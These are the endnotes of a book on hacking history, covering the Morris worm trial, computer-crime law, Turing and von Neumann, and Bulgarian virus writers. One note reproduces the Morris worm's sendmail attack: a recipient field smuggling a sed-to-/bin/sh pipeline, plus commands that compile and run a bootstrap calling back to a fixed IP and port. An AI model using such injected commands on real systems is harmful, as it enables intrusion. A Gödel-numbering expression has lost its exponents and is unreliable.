“That attitude is completely”: John Markoff, “Living with the Computer Whiz Kids,” The New York Times, November 8, 1988. See also “Hacker’s Fate Hangs in the Balance,” Syracuse Herald-Journal, February 1, 1989, A4.
permitted to reapply: John Markoff, “Cornell Suspends Computer Student,” The New York Times, May 25, 1989. Some observed that Morris was using the very skills that made him attractive to Cornell in the first place. “We like to have a fairly well-rounded student body,” said Dexter Kozen, a Cornell computer-science professor. “His creativity had manifested itself as being a good hacker, and we certainly need that in the department and that’s why he was admitted.”
“When all is said and done”: John Markoff, “How a Need for Challenge Seduced Computer Expert,” The New York Times, November 8, 1988.
calling it a “virus”: Mark W. Eichin and Jon A. Rochlis “With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988,” IEEE Symposium on Research in Security and Privacy, 1989, https://www.mit.edu/people/eichin/virus/main.html.
“One conclusion that may surprise”: Eugene Spafford, “The Internet Worm Program: An Analysis,” Purdue Technical Report CSD-TR-823, November 29, 1988, 2, https://spaf.cerias.purdue.edu/tech-reps/823.pdf.
Ken Thompson published in 1979: Robert Morris Sr. and Ken Thompson, “Password Security: A Case History,” Communications of the ACM, 22, 11 (January 1979), 595.
“What this routine does”: Source code for hs.c, line 666, https://github.com/arial-domartini/morris-worm/blob/master/hs.c. Morris did not invent the stack overflow. This exploitation technique had already been described in 1972. James P. Anderson, “Computer Security Technology Planning Study,” October 1972, 61, https://apps.dtic.mil/sti/pdfs/AD0758206.pdf. The stack overflow technique was popularized by the hacker Aleph One in his “Smashing the Stack for Fun and Profit” article, https://github.com/rootkiter/phrack/blob/master/phrack49/14.txt.
“What the Tortoise Said to Achilles”: Lewis Carroll, “What the Tortoise Said to Achilles,” Mind, 1895, 691–93.
was the Tortoise: Though Achilles actually submits the code to the computer instead of data, it is the Tortoise that tricks him into doing it.
no computer-specific offenses: For a very helpful discussion, see Orin Kerr, “Cybercrime’s Scope: Interpreting ‘Access’ and ‘Authorization’ in Computer Misuse Statutes,” New York University Law Review, 78 (2003), 1596.
amenable to theft: Kerr, “Cybercrime’s Scope,” 1605.
CFAA in 1986: See Computer Fraud and Abuse Act, October 16, 1986, codified as amended at 18 USC §1030.
five to twenty years in jail: 18 USC §1030(c). For helpful summaries of the CFAA punishment schedule, see “Cybercrime and the Law: Computer Fraud and Abuse Act (CFAA) and the 116th Congress,” Congressional Research Service, R46536, September 21, 2020, 21–22, https://sgp.fas.org/crs/misc/R46536.pdf.
punishable by up to five years: Section (a)(3) of the CFAA states, “Whoever intentionally, without authorization to access any computer of a department or agency of the United States, accesses such a computer of that department or agency that is exclusively for the use of the Government of the United States or, in the case of a computer not exclusively for such use, is used by or for the Government of the United States and such conduct affects the use of the Government’s operation of such computer.”
in only one way: As code, that is. The point of the Duality Principle, as we will see, is that the symbols that make up the code can be parsed as data as well.
losses of more than $1,000: Section (a)(5): “Intentionally accesses a Federal interest computer without authorization, and by means of one or more instances of such conduct … prevents authorized use of any such computer or information, and thereby causes loss to one or more others of a value aggregating $1,000 or more during any one year period.” Federal-interest computers are either government computers, financial institutions’ computers, or computers in different states: 18 USC §1030 (e)(2).
that was indisputable: On appeal, Morris disputed the “without authorization” element of the offense as well. He argued that he did not access protected computers on the internet “without authorization” because he was authorized to be on the internet. The 2nd Circuit rejected this argument. United States v. Robert Tappan Morris (1991), 928 F.2d 504, 508–11.
decided to charge Morris with a felony: Associated Press, “Source: Misdemeanor Offered in ‘Virus’ Case,” Syracuse Post-Standard, February 2, 1989.
He got a jury of noobs: Noob is short for “newbie,” a person who is inexperienced in a particular sphere or activity, especially computing or the use of the internet.
most experienced: Biographical information at https://en.wikipedia.org/wiki/Mark_Rasch.
“The government will prove”: Rasch, Morris transcript, 97.
“Robert Tappan Morris”: 18 USC §1030 (numbering added).
“You will hear evidence”: Guidoboni opening argument, Morris transcript, 113–14.
turned into a number: “This new description of the machine may be called the standard description (S.D.). It is made up entirely from the letters ‘A’, ‘C’, ‘D’, ‘L’, ‘R’, ‘N’, and from ‘;.’ If finally we replace ‘A’ by ‘1’, ‘C’ by ‘2’, ‘D’ by ‘3’, ‘L’ by ‘4’, ‘R’ by ‘5’, ‘N’ by ‘6’, and ‘;’. by ‘7’ we shall have a description of the machine in the form of an arabic numeral.” Alan Turing, “On Computable Numbers with an Application to the Entscheidungproblem,” Proceedings of the London Mathematical Society, 1936, 241–42.
the following encoding scheme: Turing had gotten this core insight from Gödel’s incompleteness theorem, in which Gödel figured out how a mathematical statement could talk about itself. See Kurt Gödel, “Über formal unentscheidbare Sätze der Principia Mathematica und verwandter Systeme I,” Monatshefte für Mathematik und Physik 37 (1931): 173–98.
compress into a single number: Take successive prime numbers raised to the power of each number in the sequence and add them together:
28+36+51+722+1120+1318+177+195+2318+2913+3116+3718+4113+438+4717+535+598+
6117+671+7116+735+7914+8318+898+9710+1015+10321+1071+10912+1134+1272+
13122+13720+1391+14910+15110+15716+1635+16714+17318+1798+18110+1915+19317+
1971+19916+2115+22311+22713+22916+23318+2391+24110+25121+25718+2637+2695+
27112+27714+28116+2838+29312+30718+31120+31318+3177+3315+33718+34713+34916+
35318+35913+3678+37317+3795+3838+38917+39711+40113+40916+41918+4211+43110+
43321
High-voltage circuits within: The discovery that electrical circuits can represent and manipulate binary numbers was made by Claude Shannon, “A Symbolic Analysis of Relays and Switches” (PhD diss., MIT, Department of Electrical Engineering, 1940).
can run programs we load: “It is possible to invent a single machine which can be used to compute any computable sequence. If this machine U is supplied with a tape on the beginning of which is written the S.D. of some computing machine M, then U will compute the same sequence as M.” Turing, “On Computable Numbers,” 341.
“instruction pointer”: In the X86 family of microprocessors, the instruction pointer is held in the EIP, the (extended) instruction pointer register. See generally Intel 64 and IA-32 Architectures Software Developer Manuals, 3–8, www.intel.com/content/www/us/en/developer/articles/technical/
intel-sdm.html, or any book on assembly language written in the last thirty years.
For a description of the code: Mail from: </dev/null> (sends mail from the developmental address, standard for the debug mode); rcpt to: <“|sed -e ’1,/^$/’d|/bin/sh; exit 0”> (opens the stream editor, pipes to the shell, /bin/sh, then exits); data (command to begin the content of the email; this content is sent as the input to the stream editor, which is then piped to the shell); empty line (empty line is removed by stream editor [‘1,/^$/’d]); cd /usr/tmp (change to temp directory); cat > x14481910.c << ’EOF’ (print the standard input to x14481910.c, which is a randomly generated name for the bootstrap code, end standard input when it sees an ’EOF’); EOF (signals the end of the file); text of bootstrap program (opens reverse shell via tcp socket, copies VAX and SUN binaries); c c -o x14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440 (compiles bootstrap with sender’s IP address, destination port number, and challenge question); r m -f x14481910 x14481910.c (removes bootstrap source code and compiled binary when finished); quit (quit from SMTP).
how he would ever explain data decryption: Katie Hafner and John Markoff, Cyberpunk: Outlaws and Hackers on the Computer Frontier (New York: Simon and Schuster, 1991), 333.
invaded their systems: These administrators worked at University of California–Berkeley, U.S. Army Ballistic Research Laboratory, Carnegie Mellon, Frederick Cancer Center, University of Rochester, Georgia Institute of Technology, NASA Ames Research Center, University of Illinois, Purdue University, University of Southern California, University of Florida, Lawrence Berkeley Laboratory, and Washington University.
Head of the Charles: Testimony of Paul Graham, Morris transcript, 952.
“He was pacing back and forth”: Graham, Morris transcript, 954.
“There were all sorts of”: Graham, Morris transcript, 983.
“I said, ‘You idiot’”: Graham, Morris transcript, 991–92 (inner quotation marks added).
testimonial data from juries: The common law grants additional evidentiary privileges, such as attorney-client, doctor-patient, priest-penitent, and spousal.
“slightly aloof, less endearing”: Hafner and Markoff, Cyberpunk, 338.
“So intent was he”: Hafner and Markoff, Cyberpunk, 338.
“Now, that worm, the one”: Testimony of Robert Tappan Morris, Morris transcript, 1173.
“to try to exploit Finger”: the word “demon” has been omitted. A demon, or daemon, is a service process that usually runs in the background.
“Mr. Morris, would it be fair”: Morris, Morris transcript, 1184.
“It’s perfectly honest to say”: John Markoff, “Computer Intruder Is Found Guilty,” The New York Times, January 23, 1990.
“an aggravating or mitigating circumstance”: 18 USC §3553 b(1).
“Although in and of itself”: Morris, “Judgment Including Sentence under the Sentencing Reform Act,” addendum, 6.
“I still don’t feel”: John Markoff, “Computer Intruder Is Put on Probation and Fined $10,000,” The New York Times, May 5, 1990.
Legal fees came close to $150,000: Robert fulfilled his community service working at the Boston Bar Foundation.
“took me under his wing”: Robert Tappan Morris, “Scalable TCP Congestion Control” (PhD diss., Harvard University, January 1999).
Vesselin Bontchev: Material in the next two sections from Zoom interviews with Vesselin Bontchev, October 6, 7, and 9, 2020 (hereinafter “Interview VB”).
Report on Computer Viruses: Klaus Brunnstein, Computer-Viren-Report: Gefahren, Wirkung, Aufbau, Früherkennung, Vorsorge (Munich: Wirtschaft, Recht und Steuern, 1989).
Blagovest Sendov: https://en.wikipedia.org/wiki/Blagovest_Sendov.
Komputar za vas: Komputar za vas 1–2 (1989): 5–6.
first article: “Viruses in Memory,” Komputar za vas 4–5 (1988): 12–13.
“hard plate”: “Dr. Vesselin Bontchev: Non-Replicating Malware Has Taken over the Computer Virus,” Sensors Tech Forum, November 14, 2016, https://sensorstechforum.com/dr-vesselin-bontchev-non-replicating-malware-taken-computer-virus/.
Vesselin knew this: At the time, Vesselin did not know that the Morris worm could infect only the Sun and Vax.
regret this article: “Interview with Vesselin Bontchev,” Alive 1, no. 1 (April–July 1994).
make any mistakes: Vesselin did not realize that the source code he painstakingly reconstructed had been published the previous year by Ralf Burger, a German security researcher, in the second edition of his book Computer Viruses: A High Tech Disease (London: Abacus, 1988). Burger did make the virus less infectious, but it wasn’t hard to figure out how to make it more infectious. He also changed the payload. Whereas Vienna overwrote the first five bytes of a file with reboot instructions, Burger’s version wrote five blanks. But, as Alan Solomon pointed out, Burger’s version causes the computer to hang, instead of rebooting, which “isn’t really an improvement.” Alan Solomon, “A Brief History of PC Viruses (1986–1993),” http://users.uoa.gr/~nektar/science/technology/a_brief_history_
of_viruses.htm. The publisher wrote a foreword to Burger’s book explaining the decision to publish this information: “Some readers may feel that the virus examples in the book should be omitted. It should be made clear that we have printed the examples to illustrate how easy it is to write a virus. Surely anyone who is bent on destruction will have know-how to create far more sophisticated and harmful viruses.”
figured out: “According to the Soviet anti-virus researcher Bezrukov, the first virus appeared there almost at the same time as in Bulgaria and, by the way, it was the same virus (Vienna)”: Vesselin Bontchev, “The Bulgarian and Soviet Virus Factories,” Proceedings of the 1st International Virus Bulletin Conference, 1991, 11–25, https://bontchev.nlcv.bas.bg/papers/factory.html.
Vienna is a simple virus: Well-commented source code for Vienna at https://github.com/rdebath/viruses/blob/master/virus/v/
vienna.asm.
“com infector”: Mark Ludwig, The Giant Black Book of Computer Viruses, 2nd ed. (Tucson, AZ: American Eagle Books, 2019), 20–37.
types the name of the file: Command files execute even without the “.com” extension.
“Coding in Assembly is easy”: Khalil Sehnaoui (@sehnaoui), “Coding in Assembly is easy,” Twitter, June 14, 2022, https://twitter.com/sehnaoui/status/1536610933539278849.
first lab job: Interview VB.
Teodor Prevalsky: Paul Mungo and Bryan Clough, Approaching Zero (New York: Random House, 1992), 127–28.
artificial life: Fred Cohen, It’s Alive: The New Breed of Living Computer Programs (Hoboken, NJ: Wiley, 1994); Eugene Spafford, “Computer Viruses as Artificial Life,” Journal of Artificial Life, 1994. On the inspiration of the Morris Worm, see Mungo and Clough, Approaching Zero, 127.
DOS: There were two main versions of DOS: “PC-DOS,” licensed by IBM, and “MS-DOS,” sold by Microsoft. Until MS-DOS 6.0, the only difference between versions involved BASIC. John Sheesley, “My DOS version Can Beat Up Your DOS Version,” TechRepublic, April 9, 2008, https://www.techrepublic.com/article/
my-dos-version-can-beat-up-your-dos-version.
Though Teodor took great care: Email correspondence with Vesselin Bontchev, December 3, 2022.
Vesselin claimed: Komputar za vas, 4–5 (1988); Mungo and Clough, Approaching Zero, 128.
lost business: Vienna is a “parasitic” virus, meaning that it infects a file and spreads along with it. Teodor figured out how to get it to replicate without infecting any files. His trick was to find an executable file. If the virus found, say, the Microsoft Word executable winword.exe, it would change its own name to winword.com. When users wanted to start Word, they would type in “winword” on their PC. But since DOS always runs command files before executable files, it would run winword.com first. The virus would replicate itself and name its copy after all the executables it could find, but again with .com extensions. Once finished copying, the virus would execute the real file, winword.exe. Thus, although this version of Vienna did not infect any file, it copied itself just the same by pairing with a companion. On companion viruses, see Ludwig, The Giant Black Book, 39–45.
tokens of his affection: Dimov authored around twenty-five viruses with memorable sounding names, like Terror and Manowar. Mungo and Clough, Approaching Zero, 132.
“Hello, I’m Murphy”: The second, known as Murphy 2, replaced the lame shuffling sound with the more exciting bouncing ball from the Ping-Pong virus. The Murphy viruses were highly infectious and made it to the West by 1991. Mungo and Clough, Approaching Zero, 133.
“We’ve counted about three hundred viruses”: Chuck Sudetic, “Bulgarians Linked to Computer Virus,” The New York Times, December 21, 1990.
“Not only do the Bulgarians”: Sudetic, “Bulgarians Linked.”
Commander Tosh: David S. Bennahum, “Heart of Darkness,” Wired, November 1, 1997, https://www.wired.com/1997/11/heartof/.
open only by invitation: Exceptions could be made in special circumstances: “If you cannot upload a virus, just ask the SYSOP [system operator] and he will decide if he will give you some viruses.”
Peter Dimov: Mungo and Clough, Approaching Zero, 132.
two new Bulgarian viruses: Globally, six viruses were being found per day in 1991. David Strang, “Virus Trends: Up, Up, Up,” National Computer Security Association News 2, no. 3 (March–April 1991): 2.
a naming convention: The original naming convention was developed in 1991 by Vesselin, Fridrik Skulason (Virus Bulletin’s technical editor), and Alan Solomon (developer of Dr. Solomon’s Antivirus Toolkit). See “A New Virus Naming Convention,” http://www.caro.org/articles/naming.html. The convention was considerably simplified in 2002. See Nick Fitzgerald, “A Virus by Any Other Name: The Revised CARO Naming Convention,” Virus Bulletin, January 2003, 8, https://www.virusbulletin.com/uploads/pdf/magazine/2003/200301.pdf. According to the revised convention, malware should be specified in the following format: <malware_type>://<platform>/<family_name>.<group_name>.<infective_length>.<sub-variant><devolution><modifiers>. Not all parameters need be used. For example, Eddie would be classified as virus://Dark_Avenger.1800.A (malware_type=virus; family_name=Dark_Avenger; <infective_length>=1800 (bytes); sub-variant=A).
ethical or white-hat hacking: Gary Anthes, IBM vice president for internet applications, is often credited with coining the term ethical hacking: Gary H. Anthes, “Safety First,” Computer World, June 19, 1995. The practice of hiring hackers to perform ethical hacking, however, developed slowly. “One rule that IBM’s ethical hacking effort had from the very beginning was that we would not hire ex-hackers. While some will argue that only a ‘real hacker’ would have the skill to actually do the work, we feel that the requirement for absolute trust eliminated such candidates”: C. C. Palmer, “Ethical Hacking,” IBM Systems Journal 40, no. 3 (March 1, 2001): 772.
“ethical virus writing”: On the distinction between the hacking and the antivirus communities, see Richard Ford and Sarah Gordon, “When Worlds Collide,” Proceedings of the 1st International Virus Bulletin Conference, 1999. There have been prominent exceptions to the practice of not hiring virus writers. See, e.g., the case of Sven Jaschan, writer of the destructive NetSky and Sasser worms, hired by German security company Securepoint: John Leyden, “Sasser Author Gets IT Security Job ‘Second Chance,’” The Record, September 20, 2004.
“Is it a virus”: A Trojan, named after a Trojan horse, is a malicious program that hides inside a legitimate program. Unlike viruses, Trojans are not self-replicating.
an infectious program: “A virus breaks into a healthy cell and replaces that cell’s DNA with its own; so instead of producing healthy cells, the cell now produces more viruses—which go out and infect more cells. A VIRUS program does the same thing, only with computers instead of cells.” David Gerrold, When HARLIE Was One (Release 2.0) (New York: Bantam, 1988): 209–10. The novel was originally published in 1972.
as a joke: Introduction to 2014 edition: “When HARLIE Was One is also the novel that introduced the concept of the computer virus to popular thought. For that I am profoundly sorry.”
now called malware: According to some, malware was coined in 1990 by the Israeli computer-science professor Yisrael Radai, in a public posting: “Trojans constitute only a very small percentage of malware (a word I just coined for trojans, viruses, worms, etc.).” See, e.g., Ellen Messmer, “The Origins of High-Tech’s Made Up Lingo,” June 25, 2008, https://www.pcworld.idg.com.au/article/226443/origins_high-tech_made-up_lingo/?pp=2. I have not been able to verify this claim.
self-reproducing code: For formal definitions, see Frederick B. Cohen, “Computer Viruses” 16–18 (PhD diss., University of Southern California, 1985); Len Adleman, “An Abstract Theory of Computer Viruses,” Lecture Notes in Computer Science 403 (1990).
possibility of good viruses: See, e.g., Eugene Spafford, “Response to Fred Cohen’s ‘Contest,’” Sciences 4 (January/February 1992). It should be noted that given Cohen’s definition, which privileges self-replication, package installers are viruses because they are self-replicating—they copy themselves onto your hard drive when you download them—and are good because they install packages.
Latin word: Lester Brown, ed., The New Shorter Oxford English Dictionary, vol. 2 (Oxford: Oxford University Press, 1993), 3587.
came to regret it: The term virus was coined by Cohen’s adviser, Leonard Adleman. See Sabrina Pagnotta, “Professor Len Adleman Explains How He Coined the Term ‘Computer Virus,’” WeLiveSecurity, November 2, 2017, https://www.welivesecurity.com/2017/11/01/professor-len-adleman-explains-computer-virus-term/. On Cohen’s dissatisfaction with the terminology, see Cohen, It’s Alive, 10. In media studies, Henry Jenkins has also rejected the term viral media in favor of the more neutral spreadable media. See Henry Jenkins, Spreadable Media: Creating Value and Meaning in a Networked Culture (New York: NYU Press, 2013).
beneficial viruses: See, e.g., Frederick B. Cohen, “Friendly Contagion: Harnessing the Subtle Power of Computer Viruses,” The Sciences, September/October 1991, 22–28; Frederick B. Cohen, A Case for Benevolent Viruses (Fred Cohen & Associates, 1991), http://www.all.net/books/integ/goodvcase.html. See also Julian Dibbell, “Viruses Are Good for You,” Wired, February 1995.
caused by HIV: Leonard Adleman claimed that HIV was the inspiration for the term computer virus: “I would meet with Fred on a regular basis to discuss this, and I at the same time was doing research on HIV in a molecular biology lab. So viruses and how they worked were sort of much in my mind, and I was reading a lot about molecular biology at that time. And so somewhere along the line during our discussions I started calling these things computer viruses.” See Pagnotta, “Professor Len Adleman Explains.”
earliest definition: See, e.g., Eugene H. Spafford, “The Internet Worm Incident,” in G. Gheez and J. A. McDermid, Lecture Notes in Computer Science #387 (Berlin: Springer-Verlag, 1989), 447: “A worm is a program that can run independently and can propagate a fully working version of itself to other machines. It is derived from the word tapeworm, a parasitic organism that lives inside a host and uses its resources to maintain itself. A virus is a piece of code that adds itself to other programs, including operating systems. It cannot run independently—it requires that its ‘host’ program be run to activate it. As such, it has an analog to biological viruses—those viruses are not considered alive in the usual sense; instead, they invade host cells and corrupt them, causing them to produce new viruses.”
must infect a cell: See, e.g., Spafford, “Computer Viruses,” 4: “Worms do not change other programs, although they carry other code that does, such as a true virus … The fact that worms do not modify existing programs is a clear distinction between viruses and worms.”
stand-alone personal computers: That worms leverage network connections, whereas ordinary viruses do not, leads to certain predictions. For example, it is predictable that not only will worms infect networks, but they will seek to infect hosts only once. Once a worm infects a host, it has established its toehold from which to scan and attack new hosts. Viruses, by contrast, lead to local infections. They might spread to other machines, but they require users to do so. Because viruses infect local resources, viruses will predictably seek to infect as many files as they can on a local machine, or floppy disk. Ordinary viruses infest local machines and disks, whereas worms want to be the sole malware on a host.
runs autonomously: More precisely, when the worm found a vulnerable host, it sent a small program—the bootstrap code—to the machine and executed it. The bootstrap code, in turn, sent for copies of the main worm files and turned them on.
it spreads the virus: As Teodor Prevalsky showed when he created companion viruses, viruses can spread even if they do not infect a program. By giving them names of legitimate files, viruses can fool users into executing them, thus starting a new cycle of self-replication and propagation.
“Eddie lives”: Dark Avenger acknowledged authorship of the virus in a 1991 interview. Mungo and Clough, Approaching Zero, 135.
data diddling viruses: Eddie was not only more destructive than Teodor’s virus, it was much more sophisticated. Vienna is known as a direct infector. A direct infector infects when it is run. When the program stops, so does the virus. Eddie, however, was an indirect infector. When executed, it lurked in memory waiting to ambush loaded programs. Indeed, Eddie would wait until an antivirus program was run. As the scan began, it would infect every file on the disk. The only way to stop Eddie from infecting every loaded program was to turn off the computer.
“I would say that”: Sudetic, “Bulgarians Linked.”
not on the list: Although Dark Avenger wrote Nomenklatura, as it became known, it was not found in Bulgaria. Dark Avenger had uploaded it to a U.K. virus exchange via FidoNet and released it there.
“His work is elegant”: David Briscoe, “Bulgarian Virus Writer, Scourge in the West, Hero at Home,” Associated Press, January 29, 1993, https://apnews.com/0cf9f58cce078624b05d563cc33daaaa.
crashed the system: See Yisrael Radai, “The Israeli PC Virus,” Computer & Security 2 (1989): 111–13. For the development of Jerusalem, see Alan Solomon, “A Brief History of PC Viruses (1986–1993),” users.uoa.gr/~nektar/science/technology/a_brief_history_of_viruses.htm.
there was Brain: Saad Hasan, “The Making of the First Computer Virus—The Pakistani Brain,” TRTWORLD, December 18, 2019, https://www.trtworld.com/magazine/the-making-of-the-first-computer-virus-the-pakistani-brain-32296.
doing doctoral research: As Cohen describes his eureka moment: “I was in Len Adleman’s information security class at USC when the proverbial light bulb turned on. I immediately knew that a virus could penetrate and be used to exploit any connected general-purpose system. The only question was how quickly.” He built the virus in eight hours on a VAX-11/750 system running UNIX. Sabrina Pagnotta, “Antimalware Day: Genesis of Viruses … and Computer Defense Techniques,” WeLiveSecurity, October 31, 2017, https://www.welivesecurity.com/2017/10/31/anti-malware-day-genesis-viruses/.
system administrator refused: Frederick B. Cohen, “Computer Viruses” (PhD diss., University of Southern California, 1985), 96–97.
performed useful tasks: John F. Shoch and Jon A. Hupp, “The ‘Worm’ Programs—Early Experience with a Distributed Computation,” Communications of the ACM 25, no. 3 (March 1982): 172.
Born in Budapest: Stanislaw Ulam, “John von Neumann, 1903–1957,” Bulletin of the American Mathematical Society 64, no. 3, pt. 2 (May 1958): 1; George Dyson, Turing’s Cathedral: The Origins of the Digital Universe (New York: Vintage, 2012), chap. 4; Herman Goldstine, The Computer: From Pascal to von Neumann (Princeton, NJ: Princeton University Press, 1980). In 1913, Emperor Franz Joseph ennobled John’s family for his father’s service to the Hapsburgs, adding the honorific Margittai to the family name. (Jonas Neumann de Margittai later Germanized his name to become John von Neumann.)
both degrees simultaneously: Ulam, “John von Neumann,” 2.
Herman Goldstine: Goldstine, The Computer, 167.
youngest faculty member: Mary-Ann Dimand and Robert W. Dimand, The History of Game Theory, Volume 1: From the Beginnings to 1945 (New York: Routledge, 2002), 129.
few branches of mathematics: The American Mathematical Society dedicated a whole issue of articles laying out some of von Neumann’s contributions. See Bulletin of the American Mathematical Society 64, no. 3, pt. 2 (May 1958), especially the Stan Ulam article.
(it weighed thirty tons): Steven Levy, “A Brief History of the ENIAC,” Smithsonian Magazine, November 2013, https://www.smithsonianmag.com/history/the-brief-history-of-the-eniac-computer-3889120/. Levy claims that the ENIAC had 18,000 vacuum tubes, the figure used in the text, but other estimates range from 17,468 to 19,000.
to study natural systems: John von Neumann, Theory of Self-Reproducing Automata, edited and completed by Arthur W. Burks (Champaign: University of Illinois Press, 1966), 64–73.
Von Neumann is also credited: John von Neumann, “A First Draft of a Report on the EDVAC,” IEEE Annals of the History of Computing 15, no. 4 (1993). The credit to von Neumann has been much debated. See Dyson, Turing’s Cathedral, 77–80; B. J. Copeland and Giovanni Sommaruga, “Did Zuse Anticipate Turing and von Neumann?,” in Turing’s Revolution: The Impact of His Ideas about Computability, ed. Giovanni Sommaruga and Thomas Strahm (Basel, Switzerland: Birkhäuser Cham, 2016).
resilience of biological organisms: Von Neumann, Theory of Self-Reproducing, 20.
Descartes was summoned: “Go Forth and Replicate,” Scientific American 285, no. 2 (August 2001): 34–43.
In 1949, von Neumann set out: Von Neumann completed two studies on self-replication. See “The General and Logical Theory of Automata,” in John von Neumann Collected Works, 5:288–328, and “Probabilistic Logics and the Synthesis of Reliable Organisms from Unreliable Components,” in John von Neumann Collected Works, 5:329–378. In 1957, von Neumann passed away, leaving two manuscripts on self-replicating automata unpublished: “Theory and Organization of Complicated Automata,” five lectures delivered at the University of Illinois, December 1949, and “The Theory of Automata: Construction, Reproduction, Homogeneity,” started in 1952 and worked on for a year. His colleague Arthur Burks edited the manuscripts and filled in missing details. The book was published nine years later by the University of Illinois Press, with the first manuscript being part 1 and the second part 2. See von Neumann, Theory of Self-Reproducing, xv–xix.
Just as Turing: For the relationship between Turing’s and von Neumann’s projects, see Barry McMullin, “What Is a Universal Constructor,” Dublin City University School of Electronic Engineering Technical Report, 1993.
changes the machine the self-replicator is trying to copy: Von Neumann, Theory of Self-Reproducing, 122–23. The problem for von Neumann was particularly stark because he built his self-replicator as a cellular automaton. A cellular automaton is a collection of cells arranged in a grid. Each cell can be in a finite number of states. (Von Neumann’s cells could be in twenty-nine different states.) A cell’s internal state changes according to a fixed rule. The rule determines the new internal state of each cell in terms of the current internal state of the cell and the internal states of the neighboring cells. Each cell is therefore reactive to its surrounding: its internal states are changed by those of neighboring cells. Copying the cellular automaton cell by cell would, however, require inspecting each cell, which in turn would require crossing into its neighborhood. This inspection would change the states around the observed cell. The solution to this problem, as we see above, is to use a tape—a description of the automaton—and place that tape in a “frozen,” quasi-quiescent portion of the grid, so inspection of the tape does not change its states. But see Richard Laing, “Automaton Models of Reproduction by Self-Inspection,” Theoretical Biology 66 (1977), 437–56, describing a kinetic self-replicator that inspects itself for a model.
Von Neumann wisely decided: Von Neumann originally began with a kinematic, not an abstract, mathematical model: von Neumann, Theory of Self-Reproducing, 81–83. By 1953, he gave up on the kinematic model. Von Neumann, Theory of Self-Reproducing, 93–99.
“universal constructor”: Von Neumann, Theory of Self-Reproducing, 271. As Christopher Langton noted, universal construction is not necessary for self-replication. Von Neumann built one because he was interested in sufficient conditions for self-replication, not necessary ones. Christopher G. Langton, “Self-Reproduction in Cellular Automata,” Physica D 10 (1984): 135–44.
“cellular automaton”: On cellular automata, see von Neumann, Theory of Self-Reproducing.
two hundred thousand cells: John von Neumann never finished his automaton. The most complete “organ” of his self-replicator that he produced was the Memory Control (MC) unit. The MC and the linear array (L) that contains the “blueprint” make up the “tape unit” (MC + L); the entire UC is the tape unit plus a constructing unit (CU): UC = CU + (MC + L). The MC that von Neumann describes is originally intended to be 547 cells tall and 87 cells wide, for a total of 87,589 cells. This version included some minor errors. With minimal edits from Burke to make it function as needed without error, it is 547 cells wide and 337 cells tall, for a total of 184,339 cells in its initial quiescent state. The majority of these cells will always be “buffer cells,” so Burke suggests two alternative designs (261–65; 277–79). It seems fair to say that without extreme deviation from von Neumann’s actual work, his UC (excluding the tape) would have taken around 150,000–200,000 cells to implement. Some cellular automaton enthusiasts don’t include the size of the tape when counting the cells it takes to implement a self-replicator. The most optimistic possible lower bound on the size of a tape that could possibly encode the states of ~200,000 cells (in von Neumann’s 29-state cellular automaton) is roughly 5*200,000 = 1M cells. For the first complete implementation of the von Neumann self-replicator, see Umberto Pesavento, “An Implementation of von Neumann’s Self-Reproducing Machine,” Artificial Life 2: 337–54 (1995).
self-replication is possible: Von Neumann, Theory of Self-Reproducing, 118.
internal blueprint: For the construction of the tape, see von Neumann, Theory of Self-Reproducing, 114–18.
two parts: Von Neumann, Theory of Self-Reproducing, 118–19. On page 85, written earlier, von Neumann identified the copying first, then construction.
Philosophers have long noted: Gideon Yaffe, Manifest Activity: Thomas Reid’s Theory of Action (Oxford: Clarendon Press, 2004), 79.
self-replicating entities: The internal blueprint need not be fixed, but can be composed dynamically through self-inspection. See, e.g., Jesús Ibáñez et al., “Self-Inspection Based Reproduction in Cellular Automata,” Lecture Notes in Artificial Intelligence 929 (1995): 564–76. In cases of self-inspecting self-replicators, the self-replicator “contains” a blueprint in the trivial sense that it is the blueprint.
Sarah Gordon: Email correspondence between Scott Shapiro and Sarah Gordon, June 2021, and telephone interview, June 7, 2021.
first personal computer: See Hal Stucker, “Among the Virus Thugs,” Wired, March 25, 1997, https://www.wired.com/1997/03/among-the-virus-thugs-2/.
Ping-Pong virus: Ping-Pong A targeted floppy drives; Ping-Pong B infected the hard disk’s boot sector. For a demonstration of the Ping-Pong, see www.youtube.com/watch?time_continue=52&v=yxHalzuPyi8&feature=emb_logo.
“polymorphic virus engine”: Mark Washburn had written a polymorphic virus, known as 1260, as early as 1990. See Fridrik Skulason, “1260—the Variable Virus,” Virus Bulletin, December 1991. The 1260 was a variant of Vienna.
genetic variations: Source code and documentation: https://github.com/bnjf/mte.
infects a new file: A random number generator is not part of the MtE object module. Dark Avenger, however, did include a sample pseudo–random number generator with the archive. A virus writer could supply their own random number generator. See Tarkan Yetiser, “Mutation Engine Report,” June 1992, http://web.archive.org/web/20101222120543/http://vXheavens.com/lib/ayt00.html.
shaggy-dog twists: A file infected by an MtE-mutated virus has six parts. The first section is just one byte long: it contains the instruction to jump to the end of the file where the generator resides. The second part contains the original file without the first byte. The third part is the decryptor, the fourth is the encrypted virus code, and the fifth is the original first byte of the uninfected file. The sixth section contains the mutation engine. When the virus executes, it jumps to the rear generator, which then executes the decryptor in the middle. The decryptor decrypts the body of the encrypted virus next to it and replaces the first byte to the original file. http://www.ece.ubc.ca/~irenek/techpaps/virus/IMG00014.GIF.
years to develop: According to Alan Solomon, the MtE itself was not successful: “At first, it was expected that there would be lots and lots of viruses using the MtE, because it was fairly easy to use this to make your virus hard to find. But the virus authors quickly realised that a scanner that detected one MtE virus, would detect all MtE viruses fairly easily. So very few virus authors have taken advantage of the engine (there are about a dozen or two viruses that use it).” Alan Solomon, “A Brief History of PC Viruses (1986–1993),” users.uoa.gr/~nektar/science/technology/a_brief_history_of_viruses.htm. Nevertheless, mutation engines would go on to cause huge problems for the industry: “Early in 1993,… Masouf Khafir wrote a polymorphic engine called the Trident Polymorphic Engine,… [which] is much more difficult to detect reliably than the MtE, and very difficult to avoid false alarming on.… The main events of 1993 were the emergence of an increasing number of polymorphic engines, which will make it easier and easier to write viruses that scanners find difficult to detect.”
doing viruslike actions: Legitimate processes, such as Digital Rights Management programs used as copy protection, also engage in viruslike behavior.
